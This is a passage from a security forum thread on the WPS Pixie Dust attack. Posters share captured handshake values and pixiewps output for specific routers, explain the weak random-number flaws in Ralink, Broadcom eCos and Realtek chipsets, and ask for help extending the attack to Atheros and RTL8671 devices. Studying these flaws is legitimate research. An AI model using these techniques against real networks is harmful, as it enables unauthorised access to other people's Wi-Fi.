
Thread: WPS Pixie Dust Attack (Offline WPS Attack)

  1. #401
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by emsef View Post
    Hello and thanks for the info.

    The following router is vulnerable

    Code:
    [P] WPS Manufacturer: BUFFALO INC.
    [P] WPS Model Name: WBMR-HP-GN
    [P] WPS Model Number: RT2860
    [P] Access Point Serial Number: 12345678
    https://wikidevi.com/wiki/Buffalo_WBMR-HP-GN
    Thanks buddy, added to the database. Keep up the testing and paste any vulnerable/non-vulnerable devices with all the request info if possible. A big thanks to the community! Wouldn't have been inspired without you!

  2. #402
    Quote Originally Posted by dragood
    the only reason we're able to get the PIN now is because we assume E-S1 = E-S2 = 0, which really isn't much "hacking". The only problem we are facing now is that someone needs to know how to write code to find the state of the PRNG,
    Hi there!
    You missed some points.
    In his presentation Dominique spoke about 2 flows:
    1) E-S1 = E-S2 = 0, and that is just for the Ralink chipset and was indeed the first stuff that was coded (because, indeed, it doesn't require extra brute force of the seed)
    2) Then wiire found the way to code the second breach revealed by Dominique: some Broadcom devices for which we know the "interval" used to define the seed (cracked immediately)
    In the meantime soxrok2212 sent to Dominique data from Realtek chipsets because we saw that the same PKE was used in his two routers and in my two routers with Realtek... all four routers from different manufacturers with different firmwares (but all is coming from the SDK for the rtl819x project that developers use to build their firmware)
    And Dominique found out a third breach:
    3) for these Realtek chipsets the exact time in seconds is used as a seed in the DH key exchange process - or it is the time of the last build (brute force required from the exact time (in seconds) back to 1970 < don't ask me why for some routers it was found that 1970 was used as seed)
    wiire coded everything and we have all the stuff in hand to "pixie-dust" and also to create a custom code to try a different interval.
    cheers

  3. #403
    Join Date
    2014-Nov
    Location
    Bulgaria
    Posts
    9
    Invulnerable
    Code:
    [P] E-Nonce: aa:90:80:28:ea:8e:89:cc:03:4a:ad:df:8e:87:02:26
    [P] PKE: d9:c5:a6:9e:3a:c2:34:e8:15:85:5e:b6:c4:56:76:54:cd:3f:52:0e:f4:c2:14:5a:7c:08:9d:57:f6:f6:16:dd:e3:bf:30:ed:8a:45:77:73:14:84:10:a6:43:04:9f:0c:ad:d3:6d:6b:6d:2e:fb:a1:10:a9:14:16:c8:88:68:73:2f:96:ec:83:12:19:f4:7d:ab:79:3a:f9:1d:c8:ad:03:e0:c9:08:33:78:98:fb:b0:5b:81:1f:0f:e3:1e:2e:7e:40:01:b4:e6:fd:73:2b:16:12:3d:f1:b8:8a:f6:d5:f1:19:1e:67:78:b0:4e:6f:b5:f0:d8:14:b2:90:70:b3:a9:4f:49:dc:c0:ef:9c:07:0d:c7:7d:9b:59:24:4b:02:67:67:50:42:66:8e:4c:4e:b0:7d:92:4f:42:9b:da:cb:d6:08:53:5b:fa:74:49:54:14:6d:58:6e:71:b3:8c:9e:55:c9:21:5a:7a:9d:23:07:eb:8e:c1:39:0a:d8:2f:c9:72
    [P] WPS Manufacturer: ASUSTeK Computer Inc.
    [P] WPS Model Name: Wi-Fi Protected Setup Router
    [P] WPS Model Number: RT-AC56U
    [P] Access Point Serial Number: d8:50:e6:da:0f:08
    [P] R-Nonce: 0a:e6:39:ba:f9:44:27:bb:cb:94:8a:47:4c:8e:7b:78
    [P] PKR: d8:fd:8c:86:72:8b:a8:ce:4d:e9:3d:a4:f9:9f:4c:3d:7b:62:c1:77:b2:63:52:99:c9:8b:7b:03:fb:0f:84:62:49:af:35:72:db:da:7b:a1:d8:31:3e:bb:88:a8:64:a6:83:58:80:66:fe:12:00:79:c7:42:a6:44:82:be:72:77:3e:ec:db:53:54:77:3b:be:67:3c:53:f6:c6:d9:96:e3:0a:69:99:af:3e:28:c9:a0:fb:16:12:f5:c7:4d:94:b2:99:bf:53:3b:49:53:9b:23:1e:ca:0a:8b:b1:14:50:34:ef:cc:1c:6a:d5:cb:7b:52:b5:4e:5d:b6:97:f2:de:9e:2f:ba:2e:69:30:6f:02:a2:dd:7c:29:6e:b5:f5:0b:d6:8e:41:18:2e:38:85:82:38:d7:f4:3a:67:c3:27:a1:d6:e9:e4:17:be:c7:12:71:59:66:31:63:4d:cb:b8:0c:8a:80:04:40:56:80:69:df:90:ab:37:3a:8b:cc:43:5b:3e
    [P] AuthKey: 27:e7:e4:5f:b8:60:6a:50:e5:78:a6:13:44:c4:81:40:58:7c:70:29:b0:66:0f:26:ac:83:91:9d:bd:a2:f9:8a
    [P] E-Hash1: bb:dc:4e:7e:ae:28:9a:07:84:c3:df:fd:92:96:41:62:89:f0:47:cd:6e:3e:c0:a9:21:ad:f7:ed:0a:3c:09:92
    [P] E-Hash2: 70:76:13:b9:e9:84:a2:49:dc:93:70:df:19:30:9b:b8:4e:c5:68:16:8f:5f:b5:1c:6a:87:b0:e0:a7:b6:c7:ad
    Invulnerable
    Code:
    [P] E-Nonce: 5b:e0:19:5c:4c:76:2e:08:3f:1b:b5:f1:13:ae:29:36
    [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
    [P] WPS Manufacturer: 
    [P] WPS Model Name: Wireless N Router
    [P] WPS Model Number: DIR-501
    [P] Access Point Serial Number: 20070413-0001
    [P] R-Nonce: 03:e9:eb:c1:80:d9:63:10:d8:16:77:cf:fa:41:d4:5b
    [P] PKR: 3f:2b:3b:b8:ba:89:4f:85:02:31:77:2c:71:3c:75:05:74:ca:69:da:99:f7:b8:c3:72:9c:2b:c3:9b:00:d0:f2:d3:56:7a:da:ab:65:da:99:22:cb:00:77:33:80:d0:6e:59:17:3f:3f:38:b5:8c:66:48:c9:60:03:da:5d:28:ef:7e:60:5c:7d:bd:bb:dd:7b:f4:d2:44:f0:62:74:b0:d1:3e:c2:c8:f7:7b:e8:d7:76:f5:53:84:97:9b:1b:85:83:28:fc:4b:45:ca:93:a5:5a:cd:03:0d:f4:bb:bf:c0:93:15:92:5a:43:e6:0d:ef:2c:d2:5f:5b:da:b0:ab:62:dd:76:74:03:cd:e7:ae:c8:b4:e9:ff:61:53:90:e3:70:c0:58:c7:25:99:0d:02:5c:03:96:07:5f:35:e9:ba:4a:db:67:3e:07:76:50:6f:b0:d5:0e:e1:56:e8:86:32:fd:52:68:7c:6f:83:56:ec:e5:a0:8c:80:80:25:74:ae:a6:40
    [P] AuthKey: b0:82:36:0d:19:6a:7a:00:0c:16:73:1d:fc:0b:16:62:7f:ea:f1:0f:af:31:38:90:b0:14:59:5a:08:93:a8:13
    [P] E-Hash1: d4:b3:36:3f:0e:c9:57:4f:1f:c5:44:4a:93:e2:e3:33:1f:6e:1e:1f:76:4f:6f:f6:26:4e:21:2a:86:68:ab:0b
    [P] E-Hash2: 6c:ac:17:51:5f:89:5d:00:dc:43:93:45:fc:ab:61:ff:a7:e5:f4:f0:52:97:a3:3b:4a:8d:0d:86:65:ee:aa:4d

  4. #404
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by WaLkZ View Post
    Invulnerable
    Code:
    [P] E-Nonce: aa:90:80:28:ea:8e:89:cc:03:4a:ad:df:8e:87:02:26
    [P] PKE: d9:c5:a6:9e:3a:c2:34:e8:15:85:5e:b6:c4:56:76:54:cd:3f:52:0e:f4:c2:14:5a:7c:08:9d:57:f6:f6:16:dd:e3:bf:30:ed:8a:45:77:73:14:84:10:a6:43:04:9f:0c:ad:d3:6d:6b:6d:2e:fb:a1:10:a9:14:16:c8:88:68:73:2f:96:ec:83:12:19:f4:7d:ab:79:3a:f9:1d:c8:ad:03:e0:c9:08:33:78:98:fb:b0:5b:81:1f:0f:e3:1e:2e:7e:40:01:b4:e6:fd:73:2b:16:12:3d:f1:b8:8a:f6:d5:f1:19:1e:67:78:b0:4e:6f:b5:f0:d8:14:b2:90:70:b3:a9:4f:49:dc:c0:ef:9c:07:0d:c7:7d:9b:59:24:4b:02:67:67:50:42:66:8e:4c:4e:b0:7d:92:4f:42:9b:da:cb:d6:08:53:5b:fa:74:49:54:14:6d:58:6e:71:b3:8c:9e:55:c9:21:5a:7a:9d:23:07:eb:8e:c1:39:0a:d8:2f:c9:72
    [P] WPS Manufacturer: ASUSTeK Computer Inc.
    [P] WPS Model Name: Wi-Fi Protected Setup Router
    [P] WPS Model Number: RT-AC56U
    [P] Access Point Serial Number: d8:50:e6:da:0f:08
    [P] R-Nonce: 0a:e6:39:ba:f9:44:27:bb:cb:94:8a:47:4c:8e:7b:78
    [P] PKR: d8:fd:8c:86:72:8b:a8:ce:4d:e9:3d:a4:f9:9f:4c:3d:7b:62:c1:77:b2:63:52:99:c9:8b:7b:03:fb:0f:84:62:49:af:35:72:db:da:7b:a1:d8:31:3e:bb:88:a8:64:a6:83:58:80:66:fe:12:00:79:c7:42:a6:44:82:be:72:77:3e:ec:db:53:54:77:3b:be:67:3c:53:f6:c6:d9:96:e3:0a:69:99:af:3e:28:c9:a0:fb:16:12:f5:c7:4d:94:b2:99:bf:53:3b:49:53:9b:23:1e:ca:0a:8b:b1:14:50:34:ef:cc:1c:6a:d5:cb:7b:52:b5:4e:5d:b6:97:f2:de:9e:2f:ba:2e:69:30:6f:02:a2:dd:7c:29:6e:b5:f5:0b:d6:8e:41:18:2e:38:85:82:38:d7:f4:3a:67:c3:27:a1:d6:e9:e4:17:be:c7:12:71:59:66:31:63:4d:cb:b8:0c:8a:80:04:40:56:80:69:df:90:ab:37:3a:8b:cc:43:5b:3e
    [P] AuthKey: 27:e7:e4:5f:b8:60:6a:50:e5:78:a6:13:44:c4:81:40:58:7c:70:29:b0:66:0f:26:ac:83:91:9d:bd:a2:f9:8a
    [P] E-Hash1: bb:dc:4e:7e:ae:28:9a:07:84:c3:df:fd:92:96:41:62:89:f0:47:cd:6e:3e:c0:a9:21:ad:f7:ed:0a:3c:09:92
    [P] E-Hash2: 70:76:13:b9:e9:84:a2:49:dc:93:70:df:19:30:9b:b8:4e:c5:68:16:8f:5f:b5:1c:6a:87:b0:e0:a7:b6:c7:ad
    Invulnerable
    Code:
    [P] E-Nonce: 5b:e0:19:5c:4c:76:2e:08:3f:1b:b5:f1:13:ae:29:36
    [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
    [P] WPS Manufacturer: 
    [P] WPS Model Name: Wireless N Router
    [P] WPS Model Number: DIR-501
    [P] Access Point Serial Number: 20070413-0001
    [P] R-Nonce: 03:e9:eb:c1:80:d9:63:10:d8:16:77:cf:fa:41:d4:5b
    [P] PKR: 3f:2b:3b:b8:ba:89:4f:85:02:31:77:2c:71:3c:75:05:74:ca:69:da:99:f7:b8:c3:72:9c:2b:c3:9b:00:d0:f2:d3:56:7a:da:ab:65:da:99:22:cb:00:77:33:80:d0:6e:59:17:3f:3f:38:b5:8c:66:48:c9:60:03:da:5d:28:ef:7e:60:5c:7d:bd:bb:dd:7b:f4:d2:44:f0:62:74:b0:d1:3e:c2:c8:f7:7b:e8:d7:76:f5:53:84:97:9b:1b:85:83:28:fc:4b:45:ca:93:a5:5a:cd:03:0d:f4:bb:bf:c0:93:15:92:5a:43:e6:0d:ef:2c:d2:5f:5b:da:b0:ab:62:dd:76:74:03:cd:e7:ae:c8:b4:e9:ff:61:53:90:e3:70:c0:58:c7:25:99:0d:02:5c:03:96:07:5f:35:e9:ba:4a:db:67:3e:07:76:50:6f:b0:d5:0e:e1:56:e8:86:32:fd:52:68:7c:6f:83:56:ec:e5:a0:8c:80:80:25:74:ae:a6:40
    [P] AuthKey: b0:82:36:0d:19:6a:7a:00:0c:16:73:1d:fc:0b:16:62:7f:ea:f1:0f:af:31:38:90:b0:14:59:5a:08:93:a8:13
    [P] E-Hash1: d4:b3:36:3f:0e:c9:57:4f:1f:c5:44:4a:93:e2:e3:33:1f:6e:1e:1f:76:4f:6f:f6:26:4e:21:2a:86:68:ab:0b
    [P] E-Hash2: 6c:ac:17:51:5f:89:5d:00:dc:43:93:45:fc:ab:61:ff:a7:e5:f4:f0:52:97:a3:3b:4a:8d:0d:86:65:ee:aa:4d
    Hey buddy, the DIR-501 should've worked, I've had someone else report that it worked. Did you try a full brute force with pixiewps?

  5. #405
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Hey community, someone has recently brought to my and Wiire's attention an Atheros device that produces a strange E-Nonce, it follows this pattern:
    Code:
    xx:xx:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    where x is a hex character obviously (0-9, a-f).

    It has occurred many times over different exchanges. It has happened in AR9130/AR9102 devices.

    If E-S1 and E-S2 follow the same pattern, it would be a relatively fast crack for those chips, faster than the full Realtek bruteforce. It is not yet known if this is the case, but if anyone would like to contribute some data it couldn't hurt!

    On the other hand, another Realtek chip was discovered to not use the time since Epoch PRNG, but it still follows the static PKE AND the E-Nonce follows a pattern like this:
    Code:
    xx:xx:00:00:xx:xx:00:00:xx:xx:00:00:xx:xx:00:00
    It is a SoC, the RTL8671. Being a SoC, it might use a different PRNG but it may be just as vulnerable, if not even more vulnerable. There are a few people including me that are actively looking into it. I hope we find something soon!
    Last edited by soxrok2212; 2015-06-03 at 16:53.

  6. #406
    Join Date
    2015-Jun
    Posts
    1
    Quote Originally Posted by soxrok2212 View Post
    Hey buddy, the DIR-501 should've worked, I've had someone else report that it worked. Did you try a full brute force with pixiewps?
    Hello

    For me the DIR-501 is also not working.
    Code:
    [P] E-Nonce: 51:a5:44:af:03:06:4e:0f:3e:c0:0b:b9:09:1b:c3:2c
    [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
    [P] WPS Manufacturer:
    [P] WPS Model Name: Wireless N Router
    [P] WPS Model Number: DIR-501
    [P] Access Point Serial Number: 20070413-0001
    [+] Received M1 message
    [P] R-Nonce: 4f:2b:f6:b7:08:bc:59:51:d7:b0:11:cb:0f:dd:8c:db
    [P] PKR: 86:de:bf:e6:4a:ff:74:40:45:0f:91:5d:ff:a6:34:69:9e:1c:97:93:2e:48:c5:14:94:66:bd:f9:8b:59:44:4d:cc:97:bb:8e:41:f2:9f:47:f2:e1:f0:ad:2b:01:f7:1b:cb:04:60:bd:d5:42:87:4d:75:dd:58:6c:6a:74:b5:c8:65:1d:09:32:20:0b:e2:39:e9:49:1c:29:8a:d1:9f:18:bc:4b:7e:4d:bd:db:e4:b9:9d:65:59:dd:51:c3:9d:9b:3e:5f:26:a1:76:85:bd:4e:fc:de:ac:78:0d:57:f5:72:22:f7:16:9f:b8:a7:f4:2c:4b:37:c8:3f:5f:9c:58:45:61:de:7b:17:ae:0a:c8:e1:c3:30:a0:3c:7a:0d:e2:d8:9f:fe:04:a7:c3:7a:42:c4:22:6a:32:02:2d:e5:ea:12:47:7c:06:1f:f4:62:11:94:e4:09:3f:a3:8a:76:44:88:ed:fb:a4:ff:8b:0f:2a:0c:b6:06:e0:0b:ca:05:ff:07
    [P] AuthKey: 41:64:d3:91:09:11:8b:d1:f7:ec:21:6f:29:69:48:ba:0e:1e:9b:3e:26:c5:60:41:27:a9:69:da:12:7f:59:6e
    [+] Sending M2 message
    [P] E-Hash1: f6:63:0a:dd:2a:0c:e6:e3:e0:0d:76:98:35:6a:c9:14:89:a8:3d:67:3b:5d:d2:08:ac:62:24:15:f7:e8:3d:8d
    [P] E-Hash2: 76:29:da:24:1a:d8:d4:1b:b9:b4:c9:5f:3b:1c:19:28:81:96:7a:40:f9:ac:d0:95:43:96:96:85:3c:18:49:d0
    [Pixie-Dust]
    [Pixie-Dust] Pixiewps 1.1
    [Pixie-Dust]
    [Pixie-Dust] [-] WPS pin not found!
    [Pixie-Dust]
    [Pixie-Dust][*] Time taken: 2 s
    [Pixie-Dust]
    [Pixie-Dust] [!] The AP /might be/ vulnerable to mode 4. Try again with --force or with another (newer) set of data.

    Tried also with pixiewps --force. If you need some more testing please feel free to contact me.

  7. #407
    Join Date
    2015-Apr
    Posts
    15
    Here's a D-Link 501 (Version B) which works with --force:

    Code:
    [P] E-Nonce: 50:37:4c:db:7a:3c:16:90:4b:57:6a:43:61:c2:85:01
    [P] R-Nonce: ae:9b:f2:26:29:23:38:17:0f:d3:7f:bd:92:fb:2d:3b
    [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
    [P] PKR: b5:4a:f2:45:95:44:27:92:f4:8b:65:05:6f:88:83:ff:d3:20:fe:d9:ed:d8:e1:f0:52:3d:a9:95:2a:97:33:53:f4:72:66:30:83:90:8c:3c:58:81:ce:9f:7d:31:1b:04:a2:d2:ca:a6:7b:06:ca:15:97:f4:a5:e9:f5:ef:2e:2b:b7:fc:33:1c:f7:44:01:80:20:a2:49:f4:54:5e:9d:11:49:e3:39:16:0e:45:e9:08:4d:7a:75:47:a0:a6:d1:4d:9e:ee:4a:d0:69:e4:23:ef:5d:9f:d1:4b:34:19:ed:b4:77:95:81:3d:8a:6c:64:a3:f8:5d:d4:b1:89:00:da:65:9b:11:2b:20:5d:36:49:79:a9:25:b2:b6:26:0e:51:45:eb:4c:4a:f3:f1:b3:ac:e9:67:0a:fe:9a:b6:c8:60:75:a6:1f:2a:9b:51:1f:e2:34:b0:78:64:f5:55:25:93:8b:37:d5:cf:74:fd:25:bd:43:cb:e4:e0:c7:a7:71:cf:8c
    [P] AuthKey: 8e:7d:72:ef:1d:c3:ee:c5:4a:68:56:10:d5:60:d0:0b:62:9c:d9:b1:2d:a0:a7:5c:da:81:38:fe:a4:b9:6b:4a
    [P] E-Hash1: 90:b1:29:cf:44:fd:09:3a:74:7e:e1:fb:17:51:52:85:1a:41:26:30:bb:23:44:5d:53:b5:46:c4:5c:fa:1c:19
    [P] E-Hash2: 43:d8:2a:15:c0:85:82:dc:32:1b:bf:04:47:15:73:56:fa:4a:f1:1c:13:6b:db:7a:0d:2e:fd:aa:37:96:44:7b

  8. #408
    Join Date
    2015-May
    Posts
    3
    I have a Netgear R3600v2 router, Broadcom BCM4360 chipset. Doesn't seem to be working. I can send the .cap if you want/need it. Doing brute force now.

  9. #409
    Join Date
    2015-May
    Posts
    3
    Netgear R3600v2, Broadcom BCM4360, doesn't seem to be working.
    Code:
    [P] E-Nonce: 5b:44:ac:16:26:6f:78:42:7a:9b:b7:91:60:c5:62:87
    [P] PKE: 01:fb:e7:b0:80:43:cc:24:6d:f6:9d:b8:9a:89:0e:d0:bb:0e:57:10:c9:d3:bc:c1:e8:a0:df:e6:61:3e:e9:4a:9f:70:cb:ac:0b:71:7a:0e:bd:10:2d:83:c2:a8:b4:c4:3c:53:04:7e:a7:17:13:43:81:9a:6b:f6:b7:d6:0e:32:bb:bf:33:ce:2e:ca:b6:1f:c3:48:39:77:69:63:80:99:11:78:0d:f7:0c:39:3d:4c:87:fa:c7:22:9d:97:41:11:f7:c9:b5:20:09:01:0b:4b:12:2c:88:cb:99:53:11:69:2f:48:3a:2d:f9:8b:d6:20:7c:84:a5:b0:ad:71:12:4d:46:29:74:66:58:7c:f7:fe:52:92:6c:e7:86:41:b5:20:e4:e6:b9:64:95:c6:08:f5:c4:e1:5c:7e:bf:51:a3:e2:da:17:d9:d7:b5:38:be:a5:4f:30:e8:bb:10:51:f6:78:27:0d:51:1d:49:c3:38:2a:3a:a8:2b:05:6c:72:80:49
    [P] WPS Manufacturer: NETGEAR, Inc.
    [P] WPS Model Name: R6300v2
    [P] WPS Model Number: R6300v2
    [P] Access Point Serial Number: 679
    [+] Received M1 message
    [P] R-Nonce: 2c:2a:4b:27:57:1d:b5:5f:6a:90:f0:9d:26:b7:10:28
    [P] PKR: 43:4b:29:6c:ff:cb:c9:6f:5c:f6:6e:2c:35:25:8b:e8:a4:1b:bc:b2:df:a8:10:8b:72:c6:b8:a2:0b:97:76:e4:47:66:6a:11:7a:b0:fd:75:3f:cd:17:8f:16:c6:7e:44:cd:aa:f8:fb:0f:91:80:e6:2c:31:91:a9:a5:84:4a:4a:de:31:c1:65:1e:a6:57:28:41:91:3d:11:dc:81:2c:af:b9:2f:8b:ee:41:1c:3b:05:61:03:0b:07:b0:10:b6:90:25:09:fd:e9:4e:ec:bb:f5:49:8f:5c:e1:7f:43:b8:e8:70:2c:cc:db:bd:6d:a4:12:3b:b6:1a:f5:dc:43:11:68:11:9e:eb:d2:67:b5:ea:58:7f:f9:6a:63:f2:a6:f6:21:ed:06:9f:2e:42:41:e9:18:d6:a2:7d:b5:3e:1b:04:12:eb:de:c6:05:5b:40:a5:02:b1:1a:54:6d:a6:b2:3f:71:5e:8a:b3:77:f4:b4:66:f7:f5:75:3c:a2:31:8e:dd:b3
    [P] AuthKey: 52:fd:cb:ad:ec:b8:a5:a5:5b:79:38:ca:c6:c5:8c:ef:5f:8b:be:6a:61:4c:b5:e0:19:a1:39:bf:84:fd:a4:18
    [+] Sending M2 message
    [P] E-Hash1: f3:27:0d:b1:97:6d:ba:83:18:25:44:d8:0f:34:64:09:da:ce:7c:19:b9:89:87:62:98:41:17:45:3d:e4:db:63
    [P] E-Hash2: d7:5b:14:f3:a1:43:d2:0b:3c:59:07:ae:ee:c4:dc:2a:32:a2:a4:fa:18:e5:b5:20:52:c5:85:dc:27:a6:84:6b

  10. #410
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Most Broadcom chipsets are not vulnerable because they run Linux, which uses a cryptographically secure method of generating random keys with good sources of entropy... it's pretty much completely unpredictable as of right now. In the future, something could certainly be found, but not right now. The only Broadcom devices that will work are devices that run eCos, which are typically found in DSL/wireless gateway modems or cable modem/gateways.

  11. #411
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Okay so 3 new things have been brought to my attention, some of which I've already pointed out but I just want to clear things up.
    1- Someone recently e-mailed me about an Atheros device, specifically a D-Link DIR-600 rev A1. This device has an AR9285. A few months ago, the static PKE in Realtek devices made me question their implementation. Many of you know that PKE:
    Code:
    d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
    Well, it turns out that this device also has a static PKE!
    Code:
    91:72:d8:6a:3d:bc:4c:5b:89:c8:b9:86:ff:31:ee:96:b9:bc:ab:ac:cc:1d:42:77:1d:46:09:a3:91:e3:b9:b2:c2:80:a3:2e:b4:01:58:36:f9:90:02:be:ab:94:69:31:38:4e:84:d2:7a:06:7e:bb:f6:15:9b:08:a6:55:67:48:29:c1:b0:69:fb:79:51:a8:d0:d5:bf:8d:65:58:71:4e:be:0d:33:68:30:87:04:7e:71:99:d1:26:e7:fa:8a:55:2a:b6:be:c5:23:f6:87:c8:f8:bd:6c:77:0c:09:3f:40:83:64:90:35:47:0f:b8:1b:6d:31:d5:3e:2f:35:7a:27:16:57:d8:1e:0c:8b:41:f5:1c:3b:b0:31:f5:b0:d7:23:40:26:7b:ce:b5:fd:07:c6:58:64:06:1a:45:55:4b:c4:ca:3b:50:57:bd:a0:fc:7c:69:7f:06:79:52:4e:30:1a:6d:f8:16:6e:1b:9f:51:97:e8:40:2f:9b:97:d1:7e:7e
    I wasn't able to find source code for this specific model and unfortunately I can't find a firmware link either. Here is a list with all devices that use the AR9285 chip so the community can look to see if their devices follow the same pattern.

    2- Another strange thing is happening with Atheros, specifically in the Linksys WRT160NL. This is one of Linksys's devices that is completely open source, meaning it runs Linux. This WRT160NL has a AR9130/AR9102 chipset. The strange thing here is that the Enrollee Nonce follows a strange pattern:

    Code:
    XX:XX:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    Usually, E-S1 and E-S2 are generated right after the Enrollee Nonce, so I'd bet there is some sort of issue here. Here is a download link for the open source firmware and a list of AR9130/AR9102 devices for comparison against other devices.

    3- Finally, another user pointed out a different Realtek chipset, the RTL8671 (as well as other SoC DSL/wireless modems). I assume that since this chip is a SoC, it may use a different PRNG. The nonces follow another strange pattern that as of right now we haven't been able to determine. Here is the pattern:

    Code:
    00:00:XX:XX:00:00:XX:XX:00:00:XX:XX:00:00:XX:XX
    There is a device that has been confirmed to follow this pattern, a DIGISOL DG-BG4100NU. The firmware can be downloaded and extracted with binwalk here, and the source code for the RTL8186 chip can be found here.

    --I already know that Wiire, Datahead and I are looking into these but they are both very busy and I don't know enough C to read code and understand it completely. T6_x is also looking into some interesting stuff as well. I'm coming back to the community looking for help! Maybe we can do this one without Bongard! That is my goal this time, and it probably doesn't help to make this public but thats alright! Leave a reply if you have any questions or comments and thanks in advance!
    Last edited by soxrok2212; 2015-06-10 at 04:26.

  12. #412
    Join Date
    2015-Apr
    Posts
    12
    Quote Originally Posted by soxrok2212 View Post
    Okay so 3 new things have been brought to my attention, some of which I've already pointed out but I just want to clear things up.
    1- Someone recently e-mailed me about an Atheros device, specifically a D-Link DIR-600 rev A1. This device has an AR9285. A few months ago, the static PKE in Realtek devices made me question their implementation. Many of you know that PKE:
    Code:
